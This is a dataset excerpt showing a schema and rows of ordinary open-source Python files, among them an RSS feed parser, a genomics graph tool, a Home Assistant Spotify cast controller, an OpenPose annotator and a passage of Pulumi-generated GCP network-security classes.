Dataset schema, one row per source file (⌀ = nullable column):

| column | type | range / distinct values |
|---|---|---|
| blob_id | string | length 40 |
| directory_id | string | length 40 |
| path | string | length 4 to 721 |
| content_id | string | length 40 |
| detected_licenses | list | length 0 to 57 |
| license_type | string | 2 classes |
| repo_name | string | length 5 to 91 |
| snapshot_id | string | length 40 |
| revision_id | string | length 40 |
| branch_name | string | 321 classes |
| visit_date | timestamp[ns] | 2016-08-12 09:31:09 to 2023-09-06 10:45:07 |
| revision_date | timestamp[ns] | 2010-09-28 14:01:40 to 2023-09-06 06:22:19 |
| committer_date | timestamp[ns] | 2010-09-28 14:01:40 to 2023-09-06 06:22:19 |
| github_id | int64 | 426 to 681M |
| star_events_count | int64 | 101 to 243k |
| fork_events_count | int64 | 0 to 110k |
| gha_license_id | string | 23 classes |
| gha_event_created_at | timestamp[ns] (⌀) | 2012-06-28 18:51:49 to 2023-09-14 21:59:16 |
| gha_created_at | timestamp[ns] (⌀) | 2008-02-11 22:55:26 to 2023-08-10 11:14:58 |
| gha_language | string | 147 classes |
| src_encoding | string | 26 classes |
| language | string | 2 classes |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 6 to 10.2M |
| extension | string | 115 classes |
| filename | string | length 3 to 113 |
| content | string | length 6 to 10.2M |
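Each record below pairs this provenance metadata with the raw file text in `content`. To stream records programmatically, a minimal sketch using the Hugging Face `datasets` library; `"<dataset-id>"` is a placeholder, since the dataset path is not named in this view:

```python
from datasets import load_dataset

# Stream rows rather than downloading the whole corpus up front.
ds = load_dataset("<dataset-id>", split="train", streaming=True)
for row in ds:
    # Provenance fields plus the raw source text in row["content"].
    print(row["repo_name"], row["path"], row["length_bytes"])
    break
```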
**Row 1: `fake-name/ReadableWebProxy` / `feed_parse_extractRufftranslationsWordpressCom.py`**

| field | value |
|---|---|
| blob_id | 5700766093188bda70fb80b937f4a2f0dcfe753b |
| directory_id | 6189f34eff2831e3e727cd7c5e43bc5b591adffc |
| path | /WebMirror/management/rss_parser_funcs/feed_parse_extractRufftranslationsWordpressCom.py |
| content_id | 5d9ea2e8b9a715ba990d39fad1d2f7114738729f |
| detected_licenses | ["BSD-3-Clause"] |
| license_type | permissive |
| repo_name | fake-name/ReadableWebProxy |
| snapshot_id | 24603660b204a9e7965cfdd4a942ff62d7711e27 |
| revision_id | ca2e086818433abc08c014dd06bfd22d4985ea2a |
| branch_name | refs/heads/master |
| visit_date | 2023-09-04T03:54:50.043051 |
| revision_date | 2023-08-26T16:08:46 |
| committer_date | 2023-08-26T16:08:46 |
| github_id | 39,611,770 |
| star_events_count | 207 |
| fork_events_count | 20 |
| gha_license_id | BSD-3-Clause |
| gha_event_created_at | 2023-09-11T15:48:15 |
| gha_created_at | 2015-07-24T04:30:43 |
| gha_language | Python |
| src_encoding | UTF-8 |
| language | Python |
| is_vendor | false |
| is_generated | false |
| length_bytes | 1,766 |
| extension | py |
| filename | feed_parse_extractRufftranslationsWordpressCom.py |

`content`:

```python
def extractRufftranslationsWordpressCom(item):
'''
Parser for 'rufftranslations.wordpress.com'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if frag and not (chp and vol):
chp = frag
frag = None
if not (chp or vol) or "preview" in item['title'].lower():
return None
tagmap = [
('the communication hero with the cool heroine', 'As the Communication Hero, I Formed the World\'s Strongest Party with a Cool Big Sister', 'translated'),
('the pseudo-ninja from another world', 'the pseudo-kunoichi from another world', 'translated'),
('the pseudo-kunoichi from another world', 'the pseudo-kunoichi from another world', 'translated'),
('yuri flags with the heroine', 'When I Reincarnated as the Villainess, I Raised Yuri Flags with the Heroine!?', 'translated'),
('the death flag-breaking villainess', 'I Was Reincarnated As The Villainess Of An Otome Game, But As I Broke The Death Flags With All My Might, The Heroine Opened My Route', 'translated'),
('the small-town girl becomes the demon king', 'An Unemployed Small-Town Girl Pulled Out The Enchanted Sword: She Can\'t Become The Hero, So She\'ll Become the Demon King Instead', 'translated'),
('PRC', 'PRC', 'translated'),
('Loiterous', 'Loiterous', 'oel'),
]
for tagname, name, tl_type in tagmap:
if tagname in item['tags']:
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False
```
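The two helpers, `extractVolChapterFragmentPostfix` and `buildReleaseMessageWithType`, are supplied by the surrounding ReadableWebProxy codebase rather than imported in the file. The tag-matching step itself is self-contained; a runnable illustration of that logic in isolation (entries copied from the tagmap above):

```python
# The first tagmap entry whose key appears in the item's tags decides the
# canonical series name and translation type; no match means no release.
tagmap = [
    ('PRC', 'PRC', 'translated'),
    ('Loiterous', 'Loiterous', 'oel'),
]

def match_tags(tags):
    for tagname, name, tl_type in tagmap:
        if tagname in tags:
            return name, tl_type
    return None

print(match_tags(['PRC', 'chapter 12']))  # ('PRC', 'translated')
```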
**Row 2: `gtonkinhill/panaroo` / `get_neighborhood.py`**

| field | value |
|---|---|
| blob_id | 1a6de196d1846211de58953af3477294f9ca30e3 |
| directory_id | 789e653a9f3c679e02f8f459fb72508aed9537a0 |
| path | /panaroo/get_neighborhood.py |
| content_id | 0e8a892887487fb2676e6eee4d1fb8acf88dc595 |
| detected_licenses | ["MIT"] |
| license_type | permissive |
| repo_name | gtonkinhill/panaroo |
| snapshot_id | 3df49a4ba546a83dce9d394ee5b27f89e42566f3 |
| revision_id | 0d96fc77caa4c87f37bf16e13ad0e09b6e371f96 |
| branch_name | refs/heads/master |
| visit_date | 2023-07-08T20:49:36.096596 |
| revision_date | 2023-05-10T16:22:13 |
| committer_date | 2023-05-10T16:22:13 |
| github_id | 162,318,186 |
| star_events_count | 184 |
| fork_events_count | 28 |
| gha_license_id | MIT |
| gha_event_created_at | 2023-06-29T16:43:12 |
| gha_created_at | 2018-12-18T16:43:30 |
| gha_language | Python |
| src_encoding | UTF-8 |
| language | Python |
| is_vendor | false |
| is_generated | false |
| length_bytes | 4,727 |
| extension | py |
| filename | get_neighborhood.py |

`content`:

```python
import networkx as nx
from collections import deque, defaultdict
def conv_list(maybe_list):
if not isinstance(maybe_list, list):
maybe_list = [maybe_list]
return (maybe_list)
def get_target(g, gene):
for n, attr in g.nodes(data=True):
if attr["name"] == gene:
return n
raise NameError("Gene ID does not match any in the graph!")
def bfs_with_dist(G, source, depth_limit=None, genome=None):
    """Yield (parent, child, depth) edges of a depth-limited BFS rooted at source."""
    for e in generic_bfs_edges_with_dist(G, source, depth_limit, genome=genome):
        yield e

def generic_bfs_edges_with_dist(G, source, depth_limit=None, genome=None):
    # Track visited nodes so each neighbouring gene is reported once.
    visited = {source}
    if depth_limit is None:
        depth_limit = len(G)
    queue = deque([(source, depth_limit, get_neighbours_with_genome(G, source, genome))])
while queue:
parent, depth_now, children = queue[0]
try:
child = next(children)
if child not in visited:
yield parent, child, depth_limit-depth_now+1
visited.add(child)
if depth_now > 1:
queue.append((child, depth_now - 1, get_neighbours_with_genome(G, child, genome)))
except StopIteration:
queue.popleft()
def get_neighbours_with_genome(G, node, genome):
neighbours = G.neighbors(node)
if genome is None:
return (neighbours)
else:
return (n for n in neighbours if genome in conv_list(G[node][n]['members']))
def get_options():
import argparse
description = 'Explore gene neighbourhood'
parser = argparse.ArgumentParser(description=description,
prog='panaroo-gene-neighbourhood')
parser.add_argument("--gene",
type=str,
required=True,
help="gene of interest")
parser.add_argument("--genome_id",
type=str,
default=None,
help="genome ID of interest (default=ALL)")
parser.add_argument("--graph",
type=str,
required=True,
help="genome graph gml ('final_graph.gml')")
parser.add_argument("--expand_no",
default=5,
help=("lengths of the path that will be expanded on" +
" in a radius the target gene (default=5)"),
type=int)
parser.add_argument("--out", help="output file")
args = parser.parse_args()
return (args)
def main():
args = get_options()
# load graph
G = nx.read_gml(args.graph)
for n in G.nodes():
G.nodes[n]['members'] = set(conv_list(G.nodes[n]['members']))
# find target gene
target = get_target(G, args.gene)
# find target genome id if requested
gid = None
if args.genome_id is not None:
for i, genome in enumerate(G.graph['isolateNames']):
if genome==args.genome_id:
gid = str(i)
if gid is None:
raise NameError("Genome ID does not match any in the graph!")
# write out neighbouring genes and distance from target
# allocate edges to members
mems_to_edges = defaultdict(list)
if gid is None:
msearch = G.nodes[target]['members']
else:
msearch = [int(gid)]
for mem in msearch:
for u,v,d in bfs_with_dist(G, target, depth_limit=args.expand_no, genome=mem):
mems_to_edges[mem].append((u,v))
# find path for each member
paths_to_members = defaultdict(list)
for mem in mems_to_edges:
# create temporary graph
tG = nx.Graph()
tG.add_edges_from(mems_to_edges[mem])
# find largest connected component that contains the target
for c in sorted(nx.connected_components(tG), key=len, reverse=True):
if target in c:
path = sorted(c)
break
# reorder path
spaths = nx.shortest_path_length(tG, source=target)
n = max(spaths, key=spaths.get)
path = [n] + [v for u, v in nx.dfs_edges(tG, source=n)]
paths_to_members[tuple(path)].append(mem)
# write output
with open(args.out, 'w') as outfile:
outfile.write("support\tmembers\tpath\n")
for path in paths_to_members:
outfile.write(str(len(paths_to_members[path])) + "\t")
outfile.write(",".join([G.graph['isolateNames'][m] for m in paths_to_members[path]]) + "\t")
outfile.write(",".join([G.nodes[n]['name'] for n in path]) + "\n")
return
if __name__ == '__main__':
main()
```
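From the command line the script is exposed as `panaroo-gene-neighbourhood` (per the `prog` argument above) with `--gene`, `--graph`, `--genome_id`, `--expand_no` and `--out`. The BFS helper can also be exercised directly; a small sketch on a toy graph, assuming the functions above are importable:

```python
import networkx as nx

# Toy graph: a chain a-b-c with panaroo-style 'members' edge attributes.
G = nx.Graph()
G.add_edge("a", "b", members={"0"})
G.add_edge("b", "c", members={"0"})

# Yields (parent, child, depth): ("a", "b", 1) then ("b", "c", 2).
for u, v, dist in bfs_with_dist(G, "a", depth_limit=2):
    print(u, v, dist)
```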
**Row 3: `fondberg/spotcast` / `spotcast_controller.py`**

| field | value |
|---|---|
| blob_id | 0575be2ff3ed5e48e60370a1c1f797033ce23814 |
| directory_id | 234d5fc4b0555f54a0ebaa6975c4de555c818308 |
| path | /custom_components/spotcast/spotcast_controller.py |
| content_id | a79753e25ae7768f43c8178c0da2d2665b4c8105 |
| detected_licenses | ["Apache-2.0"] |
| license_type | permissive |
| repo_name | fondberg/spotcast |
| snapshot_id | 62df14a00775404feacf4d62600b36f975bc94a0 |
| revision_id | d8816cdee4c6d1724b539f69f5bd5057082d7be3 |
| branch_name | refs/heads/master |
| visit_date | 2023-04-12T19:13:45.479293 |
| revision_date | 2023-03-19T21:50:24 |
| committer_date | 2023-03-19T21:50:24 |
| github_id | 183,212,377 |
| star_events_count | 564 |
| fork_events_count | 115 |
| gha_license_id | Apache-2.0 |
| gha_event_created_at | 2023-09-08T23:00:14 |
| gha_created_at | 2019-04-24T11:11:28 |
| gha_language | Python |
| src_encoding | UTF-8 |
| language | Python |
| is_vendor | false |
| is_generated | false |
| length_bytes | 13,881 |
| extension | py |
| filename | spotcast_controller.py |

`content`:

```python
from __future__ import annotations
import collections
import logging
import random
import time
from asyncio import run_coroutine_threadsafe
from requests import TooManyRedirects
from collections import OrderedDict
from datetime import datetime
import homeassistant.core as ha_core
import pychromecast
import aiohttp
import json
import spotipy
from homeassistant.components.cast.helpers import ChromeCastZeroconf
from homeassistant.exceptions import HomeAssistantError
from .spotify_controller import SpotifyController
from .const import CONF_SP_DC, CONF_SP_KEY
from .helpers import get_cast_devices, get_spotify_devices, get_spotify_media_player
_LOGGER = logging.getLogger(__name__)
class TokenError(Exception):
pass
class SpotifyCastDevice:
"""Represents a spotify device."""
hass = None
castDevice = None
spotifyController = None
def __init__(self, hass: ha_core.HomeAssistant, call_device_name: str, call_entity_id: str) -> None:
"""Initialize a spotify cast device."""
self.hass = hass
# Get device name from either device_name or entity_id
device_name = None
if call_device_name is None:
entity_id = call_entity_id
if entity_id is None:
raise HomeAssistantError(
"Either entity_id or device_name must be specified"
)
entity_states = hass.states.get(entity_id)
if entity_states is None:
_LOGGER.error("Could not find entity_id: %s", entity_id)
else:
device_name = entity_states.attributes.get("friendly_name")
else:
device_name = call_device_name
if device_name is None or device_name.strip() == "":
raise HomeAssistantError("device_name is empty")
# Find chromecast device
self.castDevice = self.getChromecastDevice(device_name)
_LOGGER.debug("Found cast device: %s", self.castDevice)
self.castDevice.wait()
    def getChromecastDevice(self, device_name: str) -> pychromecast.Chromecast:
# Get cast from discovered devices of cast platform
known_devices = get_cast_devices(self.hass)
_LOGGER.debug("Chromecast devices: %s", known_devices)
cast_info = next(
(
castinfo
for castinfo in known_devices
if castinfo.friendly_name == device_name
),
None,
)
_LOGGER.debug("cast info: %s", cast_info)
if cast_info:
return pychromecast.get_chromecast_from_cast_info(
cast_info.cast_info, ChromeCastZeroconf.get_zeroconf()
)
_LOGGER.error(
"Could not find device %s from hass.data",
device_name,
)
raise HomeAssistantError(
"Could not find device with name {}".format(device_name)
)
def startSpotifyController(self, access_token: str, expires: int) -> None:
sp = SpotifyController(access_token, expires)
self.castDevice.register_handler(sp)
sp.launch_app()
if not sp.is_launched and not sp.credential_error:
raise HomeAssistantError(
"Failed to launch spotify controller due to timeout"
)
if not sp.is_launched and sp.credential_error:
raise HomeAssistantError(
"Failed to launch spotify controller due to credentials error"
)
self.spotifyController = sp
    def getSpotifyDeviceId(self, user_id) -> str:
spotify_media_player = get_spotify_media_player(self.hass, user_id)
max_retries = 5
counter = 0
devices_available = None
_LOGGER.debug("Searching for Spotify device: {}".format(self.spotifyController.device))
while counter < max_retries:
devices_available = get_spotify_devices(spotify_media_player)
# Look for device to make sure we can start playback
if devices := devices_available["devices"]:
for device in devices:
if device["id"] == self.spotifyController.device:
_LOGGER.debug("Found matching Spotify device: {}".format(device))
return device["id"]
sleep = random.uniform(1.5, 1.8) ** counter
time.sleep(sleep)
counter = counter + 1
_LOGGER.error(
'No device with id "{}" known by Spotify'.format(
self.spotifyController.device
)
)
_LOGGER.error("Known devices: {}".format(devices_available["devices"]))
raise HomeAssistantError("Failed to get device id from Spotify")
class SpotifyToken:
"""Represents a spotify token for an account."""
hass = None
sp_dc = None
sp_key = None
_access_token = None
_token_expires = 0
def __init__(self, hass: ha_core.HomeAssistant, sp_dc: str, sp_key: str) -> None:
self.hass = hass
self.sp_dc = sp_dc
self.sp_key = sp_key
    def ensure_token_valid(self) -> bool:
        if float(self._token_expires) > time.time():
            return True
        # get_spotify_token raises on failure, so the token is valid past here
        self.get_spotify_token()
        return True
@property
def access_token(self) -> str:
self.ensure_token_valid()
_LOGGER.debug("expires: %s time: %s", self._token_expires, time.time())
return self._access_token
def get_spotify_token(self) -> tuple[str, int]:
try:
self._access_token, self._token_expires = run_coroutine_threadsafe(
self.start_session(), self.hass.loop
).result()
expires = self._token_expires - int(time.time())
return self._access_token, expires
except TooManyRedirects:
_LOGGER.error("Could not get spotify token. sp_dc and sp_key could be expired. Please update in config.")
raise HomeAssistantError("Expired sp_dc, sp_key")
        except Exception:  # includes TokenError
raise HomeAssistantError("Could not get spotify token.")
async def start_session(self):
""" Starts session to get access token. """
cookies = {'sp_dc': self.sp_dc, 'sp_key': self.sp_key}
async with aiohttp.ClientSession(cookies=cookies) as session:
headers = {'user-agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"}
async with session.get('https://open.spotify.com/get_access_token?reason=transport&productType=web_player', allow_redirects=False, headers=headers) as response:
                if response.status != 200:
_LOGGER.info("Unsuccessful token request, received code %i", response.status)
raise TokenError()
data = await response.text()
config = json.loads(data)
access_token = config['accessToken']
expires_timestamp = config['accessTokenExpirationTimestampMs']
expiration_date = int(expires_timestamp) // 1000
return access_token, expiration_date
class SpotcastController:
spotifyTokenInstances = {}
accounts: dict = {}
hass = None
def __init__(self, hass: ha_core.HomeAssistant, sp_dc: str, sp_key: str, accs: collections.OrderedDict) -> None:
if accs:
self.accounts = accs
self.accounts["default"] = OrderedDict([("sp_dc", sp_dc), ("sp_key", sp_key)])
self.hass = hass
    def get_token_instance(self, account: str = None) -> SpotifyToken:
"""Get token instance for account"""
if account is None:
account = "default"
dc = self.accounts.get(account).get(CONF_SP_DC)
key = self.accounts.get(account).get(CONF_SP_KEY)
_LOGGER.debug("setting up with account %s", account)
if account not in self.spotifyTokenInstances:
self.spotifyTokenInstances[account] = SpotifyToken(self.hass, dc, key)
return self.spotifyTokenInstances[account]
def get_spotify_client(self, account: str) -> spotipy.Spotify:
return spotipy.Spotify(auth=self.get_token_instance(account).access_token)
def _getSpotifyConnectDeviceId(self, client, device_name):
media_player = get_spotify_media_player(self.hass, client._get("me")["id"])
devices_available = get_spotify_devices(media_player)
for device in devices_available["devices"]:
if device["name"] == device_name:
return device["id"]
return None
def get_spotify_device_id(self, account, spotify_device_id, device_name, entity_id):
# login as real browser to get powerful token
access_token, expires = self.get_token_instance(account).get_spotify_token()
# get the spotify web api client
client = spotipy.Spotify(auth=access_token)
# first, rely on spotify id given in config
if not spotify_device_id:
# if not present, check if there's a spotify connect device with that name
spotify_device_id = self._getSpotifyConnectDeviceId(client, device_name)
if not spotify_device_id:
# if still no id available, check cast devices and launch the app on chromecast
spotify_cast_device = SpotifyCastDevice(
self.hass,
device_name,
entity_id,
)
me_resp = client._get("me")
spotify_cast_device.startSpotifyController(access_token, expires)
# Make sure it is started
spotify_device_id = spotify_cast_device.getSpotifyDeviceId(me_resp["id"])
return spotify_device_id
def play(
self,
client: spotipy.Spotify,
spotify_device_id: str,
uri: str,
random_song: bool,
position: str,
ignore_fully_played: str,
country_code: str = None
) -> None:
_LOGGER.debug(
"Playing URI: %s on device-id: %s",
uri,
spotify_device_id,
)
if uri.find("show") > 0:
show_episodes_info = client.show_episodes(uri, market=country_code)
if show_episodes_info and len(show_episodes_info["items"]) > 0:
if ignore_fully_played:
for episode in show_episodes_info["items"]:
if not episode["resume_point"]["fully_played"]:
episode_uri = episode["external_urls"]["spotify"]
break
else:
episode_uri = show_episodes_info["items"][0]["external_urls"][
"spotify"
]
_LOGGER.debug(
"Playing episode using uris (latest podcast playlist)= for uri: %s",
episode_uri,
)
client.start_playback(device_id=spotify_device_id, uris=[episode_uri])
elif uri.find("episode") > 0:
_LOGGER.debug("Playing episode using uris= for uri: %s", uri)
client.start_playback(device_id=spotify_device_id, uris=[uri])
elif uri.find("track") > 0:
_LOGGER.debug("Playing track using uris= for uri: %s", uri)
client.start_playback(device_id=spotify_device_id, uris=[uri])
else:
if uri == "random":
_LOGGER.debug(
"Cool, you found the easter egg with playing a random playlist"
)
playlists = client.user_playlists("me", 50)
no_playlists = len(playlists["items"])
uri = playlists["items"][random.randint(0, no_playlists - 1)]["uri"]
kwargs = {"device_id": spotify_device_id, "context_uri": uri}
if random_song:
if uri.find("album") > 0:
results = client.album_tracks(uri, market=country_code)
position = random.randint(0, results["total"] - 1)
elif uri.find("playlist") > 0:
results = client.playlist_tracks(uri)
position = random.randint(0, results["total"] - 1)
elif uri.find("collection") > 0:
results = client.current_user_saved_tracks()
position = random.randint(0, results["total"] - 1)
_LOGGER.debug("Start playback at random position: %s", position)
if uri.find("artist") < 1:
kwargs["offset"] = {"position": position}
_LOGGER.debug(
'Playing context uri using context_uri for uri: "%s" (random_song: %s)',
uri,
random_song,
)
client.start_playback(**kwargs)
def get_playlists(self, account: str, playlist_type: str, country_code: str, locale: str, limit: int) -> dict:
client = self.get_spotify_client(account)
resp = {}
if playlist_type == "discover-weekly":
playlist_type = "made-for-x"
if playlist_type == "user" or playlist_type == "default" or playlist_type == "":
resp = client.current_user_playlists(limit=limit)
elif playlist_type == "featured":
resp = client.featured_playlists(
locale=locale,
country=country_code,
timestamp=datetime.now().strftime("%Y-%m-%dT%H:%M:%S"),
limit=limit,
offset=0,
)
resp = resp.get("playlists")
else:
resp = client._get(
"views/" + playlist_type,
content_limit=limit,
locale=locale,
platform="web",
types="album,playlist,artist,show,station",
limit=limit,
offset=0,
)
resp = resp.get("content")
return resp
```
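Two behaviors worth noting: `get_spotify_token` drives a browser-style cookie login (`sp_dc`/`sp_key`) against `open.spotify.com`, and `getSpotifyDeviceId` polls for the cast device with a randomized exponential backoff. A self-contained sketch of the delay schedule that `random.uniform(1.5, 1.8) ** counter` produces:

```python
import random

# Attempt 0 always sleeps 1.0s (x ** 0 == 1); by attempt 4 the delay
# lands somewhere between 1.5**4 ~ 5.1s and 1.8**4 ~ 10.5s.
for attempt in range(5):
    delay = random.uniform(1.5, 1.8) ** attempt
    print(f"attempt {attempt}: sleep {delay:.2f}s")
```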
**Row 4: `mcclure/bitbucket-backup` / `make.py`**

| field | value |
|---|---|
| blob_id | b792f5ab574424a49a059dab5b8a12c5cf71a1b2 |
| directory_id | ab7d5ec2e40b26c33da957210b5d2da77f9b696d |
| path | /repos/emily-unstable/contents/make.py |
| content_id | 43d1264ceb0f6347bdcd73f46e59d9dbeabd438d |
| detected_licenses | ["MIT", "LicenseRef-scancode-public-domain", "LicenseRef-scancode-unknown-license-reference"] |
| license_type | permissive |
| repo_name | mcclure/bitbucket-backup |
| snapshot_id | e49d280363ff7ef687f03473e463865a7ad8a817 |
| revision_id | b6a02ca8decf843fa0a765c842c24e7eccf59307 |
| branch_name | refs/heads/archive |
| visit_date | 2023-01-24T21:15:14.875131 |
| revision_date | 2020-02-02T20:56:23 |
| committer_date | 2020-02-02T20:56:23 |
| github_id | 237,833,969 |
| star_events_count | 115 |
| fork_events_count | 6 |
| gha_license_id | null |
| gha_event_created_at | 2023-01-07T14:24:14 |
| gha_created_at | 2020-02-02T20:43:56 |
| gha_language | C |
| src_encoding | UTF-8 |
| language | Python |
| is_vendor | false |
| is_generated | false |
| length_bytes | 53 |
| extension | py |
| filename | make.py |

`content`:

```python
#!/usr/bin/python
execfile("develop/build/make.py")
```
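`execfile` makes this a Python 2 script, even though the repository's primary language is listed as C. Under Python 3 the closest equivalent (shown as a sketch, not as a change to the archived file) would be:

```python
# Python 3 replacement for execfile("develop/build/make.py")
exec(open("develop/build/make.py").read())
```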
**Row 5: `HighCWu/ControlLoRA` / `annotator/openpose/__init__.py`**

| field | value |
|---|---|
| blob_id | e05cdf3f72ac8c2415bf0219331dad1587668259 |
| directory_id | 53c4ec58760768fc9073793cf17cd8c55978c3af |
| path | /annotator/openpose/__init__.py |
| content_id | 8c26f1b37dae854f51da938da2fa67a8ef48ce5a |
| detected_licenses | ["Apache-2.0"] |
| license_type | permissive |
| repo_name | HighCWu/ControlLoRA |
| snapshot_id | 0b6cab829134ed8377f22800b0e1d648ddf573b0 |
| revision_id | 3b8481950867f61b2cf072b1f156d84f3363ac20 |
| branch_name | refs/heads/main |
| visit_date | 2023-08-05T08:51:25.864774 |
| revision_date | 2023-02-28T13:06:24 |
| committer_date | 2023-02-28T13:06:24 |
| github_id | 603,359,062 |
| star_events_count | 421 |
| fork_events_count | 20 |
| gha_license_id | Apache-2.0 |
| gha_event_created_at | 2023-08-02T02:14:40 |
| gha_created_at | 2023-02-18T09:12:15 |
| gha_language | Python |
| src_encoding | UTF-8 |
| language | Python |
| is_vendor | false |
| is_generated | false |
| length_bytes | 1,957 |
| extension | py |
| filename | __init__.py |

`content`:

```python
import os
os.environ["KMP_DUPLICATE_LIB_OK"]="TRUE"
import torch
import numpy as np
from . import util
from .body import Body
from .hand import Hand
from annotator.util import annotator_ckpts_path
body_model_path = "https://huggingface.co/lllyasviel/ControlNet/resolve/main/annotator/ckpts/body_pose_model.pth"
hand_model_path = "https://huggingface.co/lllyasviel/ControlNet/resolve/main/annotator/ckpts/hand_pose_model.pth"
class OpenposeDetector:
def __init__(self):
body_modelpath = os.path.join(annotator_ckpts_path, "body_pose_model.pth")
hand_modelpath = os.path.join(annotator_ckpts_path, "hand_pose_model.pth")
if not os.path.exists(hand_modelpath):
from basicsr.utils.download_util import load_file_from_url
load_file_from_url(body_model_path, model_dir=annotator_ckpts_path)
load_file_from_url(hand_model_path, model_dir=annotator_ckpts_path)
self.body_estimation = Body(body_modelpath)
self.hand_estimation = Hand(hand_modelpath)
def __call__(self, oriImg, hand=False):
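        # Reverse the channel order (RGB <-> BGR, OpenCV convention) before inference.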
oriImg = oriImg[:, :, ::-1].copy()
with torch.no_grad():
candidate, subset = self.body_estimation(oriImg)
canvas = np.zeros_like(oriImg)
canvas = util.draw_bodypose(canvas, candidate, subset)
if hand:
hands_list = util.handDetect(candidate, subset, oriImg)
all_hand_peaks = []
for x, y, w, is_left in hands_list:
peaks = self.hand_estimation(oriImg[y:y+w, x:x+w, :])
peaks[:, 0] = np.where(peaks[:, 0] == 0, peaks[:, 0], peaks[:, 0] + x)
peaks[:, 1] = np.where(peaks[:, 1] == 0, peaks[:, 1], peaks[:, 1] + y)
all_hand_peaks.append(peaks)
canvas = util.draw_handpose(canvas, all_hand_peaks)
return canvas, dict(candidate=candidate.tolist(), subset=subset.tolist())
```
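A rough usage sketch, assuming the `annotator` package is importable and the checkpoint download via `basicsr` succeeds on first use (the input array is an illustrative stand-in for a real frame):

```python
import numpy as np
from annotator.openpose import OpenposeDetector

detector = OpenposeDetector()                    # fetches weights if missing
frame = np.zeros((512, 512, 3), dtype=np.uint8)  # stand-in RGB image
canvas, pose = detector(frame, hand=True)
print(canvas.shape, len(pose["candidate"]))
```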
**Row 6: `pulumi/pulumi-gcp` / `networksecurity/_inputs.py`**

| field | value |
|---|---|
| blob_id | 16e5ef8902364f6612fb6cc1bcc0f7f61a019736 |
| directory_id | aeef2494b283012ed619870c4275e7d015f4017a |
| path | /sdk/python/pulumi_gcp/networksecurity/_inputs.py |
| content_id | 2c6eaabc8b00a32bbb9323b88c306e930087f616 |
| detected_licenses | ["BSD-3-Clause", "MPL-2.0", "Apache-2.0"] |
| license_type | permissive |
| repo_name | pulumi/pulumi-gcp |
| snapshot_id | d4fd3f80c3df5290edaf33eb5eafe34e6699d0ff |
| revision_id | 7deea0a50a4ee5ab7bd722a83eca01707e298f85 |
| branch_name | refs/heads/master |
| visit_date | 2023-08-31T07:12:45.921522 |
| revision_date | 2023-08-31T06:16:27 |
| committer_date | 2023-08-31T06:16:27 |
| github_id | 97,485,806 |
| star_events_count | 160 |
| fork_events_count | 63 |
| gha_license_id | Apache-2.0 |
| gha_event_created_at | 2023-09-14T19:49:36 |
| gha_created_at | 2017-07-17T14:28:37 |
| gha_language | Java |
| src_encoding | UTF-8 |
| language | Python |
| is_vendor | false |
| is_generated | false |
| length_bytes | 35,400 |
| extension | py |
| filename | _inputs.py |

`content`:

```python
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import copy
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'AuthorizationPolicyRuleArgs',
'AuthorizationPolicyRuleDestinationArgs',
'AuthorizationPolicyRuleDestinationHttpHeaderMatchArgs',
'AuthorizationPolicyRuleSourceArgs',
'ClientTlsPolicyClientCertificateArgs',
'ClientTlsPolicyClientCertificateCertificateProviderInstanceArgs',
'ClientTlsPolicyClientCertificateGrpcEndpointArgs',
'ClientTlsPolicyServerValidationCaArgs',
'ClientTlsPolicyServerValidationCaCertificateProviderInstanceArgs',
'ClientTlsPolicyServerValidationCaGrpcEndpointArgs',
'ServerTlsPolicyMtlsPolicyArgs',
'ServerTlsPolicyMtlsPolicyClientValidationCaArgs',
'ServerTlsPolicyMtlsPolicyClientValidationCaCertificateProviderInstanceArgs',
'ServerTlsPolicyMtlsPolicyClientValidationCaGrpcEndpointArgs',
'ServerTlsPolicyServerCertificateArgs',
'ServerTlsPolicyServerCertificateCertificateProviderInstanceArgs',
'ServerTlsPolicyServerCertificateGrpcEndpointArgs',
]
@pulumi.input_type
class AuthorizationPolicyRuleArgs:
def __init__(__self__, *,
destinations: Optional[pulumi.Input[Sequence[pulumi.Input['AuthorizationPolicyRuleDestinationArgs']]]] = None,
sources: Optional[pulumi.Input[Sequence[pulumi.Input['AuthorizationPolicyRuleSourceArgs']]]] = None):
"""
:param pulumi.Input[Sequence[pulumi.Input['AuthorizationPolicyRuleDestinationArgs']]] destinations: List of attributes for the traffic destination. All of the destinations must match. A destination is a match if a request matches all the specified hosts, ports, methods and headers.
If not set, the action specified in the 'action' field will be applied without any rule checks for the destination.
Structure is documented below.
:param pulumi.Input[Sequence[pulumi.Input['AuthorizationPolicyRuleSourceArgs']]] sources: List of attributes for the traffic source. All of the sources must match. A source is a match if both principals and ipBlocks match.
If not set, the action specified in the 'action' field will be applied without any rule checks for the source.
Structure is documented below.
"""
if destinations is not None:
pulumi.set(__self__, "destinations", destinations)
if sources is not None:
pulumi.set(__self__, "sources", sources)
@property
@pulumi.getter
def destinations(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['AuthorizationPolicyRuleDestinationArgs']]]]:
"""
List of attributes for the traffic destination. All of the destinations must match. A destination is a match if a request matches all the specified hosts, ports, methods and headers.
If not set, the action specified in the 'action' field will be applied without any rule checks for the destination.
Structure is documented below.
"""
return pulumi.get(self, "destinations")
@destinations.setter
def destinations(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['AuthorizationPolicyRuleDestinationArgs']]]]):
pulumi.set(self, "destinations", value)
@property
@pulumi.getter
def sources(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['AuthorizationPolicyRuleSourceArgs']]]]:
"""
List of attributes for the traffic source. All of the sources must match. A source is a match if both principals and ipBlocks match.
If not set, the action specified in the 'action' field will be applied without any rule checks for the source.
Structure is documented below.
"""
return pulumi.get(self, "sources")
@sources.setter
def sources(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['AuthorizationPolicyRuleSourceArgs']]]]):
pulumi.set(self, "sources", value)
@pulumi.input_type
class AuthorizationPolicyRuleDestinationArgs:
def __init__(__self__, *,
